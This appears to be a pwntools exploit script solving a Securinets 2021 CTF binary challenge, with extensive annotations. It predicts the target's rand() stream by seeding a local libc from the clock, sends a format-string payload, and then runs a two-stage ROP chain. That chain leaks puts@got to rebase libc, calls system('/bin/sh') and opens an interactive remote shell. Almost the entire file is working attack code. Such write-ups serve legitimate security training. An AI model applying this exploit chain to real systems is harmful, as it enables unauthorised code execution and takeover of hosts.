securitnet2021-final
from pwn import *
from ctypes import *
from time import sleep
# Debug logging dumps every byte sent and received -- useful while the chain
# is being developed, very noisy once it works.
context.log_level = 'debug'
# Load the challenge's libc into *this* process so that rlibc.rand() below
# walks the same PRNG stream the target walks.  NOTE(review): CDLL() is a
# dlopen(), so the initialisers of a challenge-provided .so run locally --
# treat the file as untrusted code and run this from a throwaway VM/container.
rlibc = CDLL('./libc.so')
# Seed from our own clock, on the assumption that the target does
# srand(time(0)) at about the same moment (inferred from this script, not
# visible here).  Any clock skew against the remote, or a connect that lands
# on a second boundary, desynchronises the stream; if the game below never
# hits a winning draw, simply re-run.  (ctypes returns time() through its
# default c_int type, which truncates time_t -- harmless until 2038.)
rlibc.srand(rlibc.time(0))
# p = process('./chall')
p = remote('pwn1.f21.ctfsecurinets.com', 21251)
# Target binary (GOT/PLT entries) and its libc (symbol offsets for stage 2).
e = ELF('./chall')
libc = ELF('./libc.so')
# Play the target's rand()-gated game with our mirrored PRNG: answer 'y'
# (keep playing) while the next draw is below 70, answer 'n' and stop on the
# first draw of 70..79.  Presumably each prompt consumes exactly one
# rand() % 80 on the remote and 70..79 is the winning range -- both are
# inferred from this script, confirm against the binary.  The 1000-round
# bound only keeps a desynchronised seed from spinning forever.
for _round in range(1000):
    draw = rlibc.rand() % 80
    keep_playing = draw < 70
    p.sendlineafter(':', 'y' if keep_playing else 'n')
    if not keep_playing:
        break
# Second interaction: 0x40 filler bytes, then "%s" and a NUL terminator.  The
# '%s' suggests this buffer later reaches a printf-style call on the target
# (a format-string read); what it actually leaks is not visible from here.
# sendafter() is used (not sendlineafter) so the NUL stays the last byte sent.
fmt_leak = b'a' * 0x40
fmt_leak += b'%s\0'
p.sendafter(':', fmt_leak)
# Gadgets in the main binary.  Absolute 0x40xxxx addresses, so the binary is
# assumed non-PIE; the name and the +1 offset say this is a `pop rdi ; ret`
# with `ret` pointing at its trailing ret (used as an alignment pad).
pop_rdi = 0x401403
ret = 0x401404
# Stage 1: 0x20 bytes of filler up to the saved rbp, a fake rbp of 0x404800
# (presumably somewhere writable in .bss, so the re-entered function has a
# sane frame), then puts(puts@got) to leak a libc address, and finally a
# return into 0x401343 -- presumably back into the vulnerable routine so the
# same overflow can be used again for stage 2.  The 0x20 offset and the
# meaning of 0x401343 come from the challenge binary and cannot be checked
# here.  None of these static addresses contain 0x0a, so sendline is safe.
stage1 = b''.join([
    b'a' * 0x20,
    p64(0x404800),          # saved rbp
    p64(pop_rdi),
    p64(e.got['puts']),     # rdi = &puts@got
    p64(ret),               # 16-byte stack alignment before the call
    p64(e.plt['puts']),     # leak the resolved puts address
    p64(0x401343),          # re-enter for stage 2
])
p.sendlineafter('?', stage1)
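# Skip two lines of target output before the leaked puts@got value.
# NOTE(review): the line count depends on the target's prompts -- if this
# hangs, dump p.recv() and count instead.
p.recvline()
p.recvline()
leak = p.recvline()[:-1]            # drop the '\n' that puts() appends
# puts() stops at the first NUL byte, so a userland pointer arrives as 5-7
# bytes (usually 6).  Pad to 8 with NULs instead of blindly appending two:
# the original `leak + b'\0\0'` made u64() raise for any length other than 6.
puts = u64(leak.ljust(8, b'\0'))
print(hex(puts))
# Rebase libc from the leaked symbol and derive the stage-2 ingredients.
libc_base = puts - libc.sym['puts']
system = libc_base + libc.sym['system']
binsh = libc_base + next(libc.search(b'/bin/sh'))
print(hex(libc_base))
print(hex(system))
print(hex(binsh))
# Sanity check: libc is mapped page-aligned, so low bits in the base mean the
# leak line was misparsed (wrong line count, junk before the address, or the
# remote runs a different libc than ./libc.so).  Warn rather than abort so the
# printed values above can still be inspected.
if libc_base & 0xfff:
    log.warning('libc base %#x is not page-aligned -- leak probably misparsed', libc_base)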
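# Stage 2: 0x28 bytes reach the saved return address (the 0x20 filler of
# stage 1 plus the 8-byte saved rbp, whose value no longer matters), then
# system("/bin/sh").  The extra `ret` presumably re-aligns rsp to 16 bytes
# before the call; 0xffff is a throwaway return address for when system()
# returns.
stage2 = b''.join([
    b'a' * 0x28,
    p64(pop_rdi),
    p64(binsh),             # rdi = "/bin/sh"
    p64(ret),               # alignment pad
    p64(system),
    p64(0xffff),            # dummy return address
])
# binsh/system change with every ASLR base.  sendline() appends '\n'; if the
# target reads its input with a line-oriented call (not visible here), a 0x0a
# byte inside one of these addresses would truncate the chain.  Warn so a
# silent failure is explainable -- re-running yields a different base.
if b'\n' in stage2:
    log.warning('stage-2 chain contains 0x0a; a line-based read may truncate it -- re-run')
p.sendline(stage2)
p.interactive()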